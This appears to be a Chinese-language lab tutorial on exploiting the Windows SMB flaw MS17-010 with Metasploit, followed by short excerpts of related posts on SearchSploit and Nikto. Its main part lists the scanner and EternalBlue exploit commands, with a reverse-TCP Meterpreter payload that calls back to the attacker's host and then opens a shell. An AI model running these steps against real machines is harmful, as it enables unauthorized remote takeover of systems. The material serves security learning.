檔案共享服務,存在安全隱患
smb服務 服務上有漏洞
有關於smb的乙個漏洞
漏洞編號:ms17-010
存在該漏洞的常用作業系統:2008 window 7
做伺服器需要關閉防火牆,不給其他人提供服務了
kail下的msf
先ping通,啟動msf
啟動命令:msfconsole
輔助模組:auxiliary 收集資訊、測試
攻擊模組:exploits 模組裡面有攻擊載荷:payloads
命令:use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.10.6 設定目標位址
run 看是否存在漏洞
使用攻擊模組
use exploit/windows/smb/ms17_010_eternablue
show options
set rhosts 192.168.10.6
set payload windows/x64/meterpreter/reverse_tcp 反向tcp連線
set lhost 192.168.10.128 配置載荷,讓受害者連自己的ip
exploit
當出現meterpreter > 證明攻擊完成
輸入shell
kail下的metasploit使用
一 使用metasploit前的準備工作 修改yun源 vim etc apt sources.list 更新apt get updateapt get upgrade apt get update 更新源列表。如果修改源列表或者想要進行同步重新整理或新增新的源,應該執行上面的命令。安裝簽名 apt...
SearchSploit漏洞查詢工具使用指南
searchsploit 是乙個用於exploit db的命令列搜尋工具,它還允許你隨身帶乙份exploit db的副本。searchsploit為您提供了在本地儲存的儲存庫中執行詳細的離線搜尋的能力。這種能力特別適用於在沒有網際網路接入的情況下對網路進行安全評估。許多漏洞都包含了二進位制檔案的鏈結...
漏洞掃瞄工具nikto使用心得
http www.cirt.net 官方 簡單掃瞄 目標基本web基本配製資訊,伺服器,php解析器等版本資訊 perl nkito.pl h 192.168.0.1 多埠掃瞄 perl nikto.pl h 192.168.0.1 p 80,88,443 加 掃瞄 perl nikto.pl h ...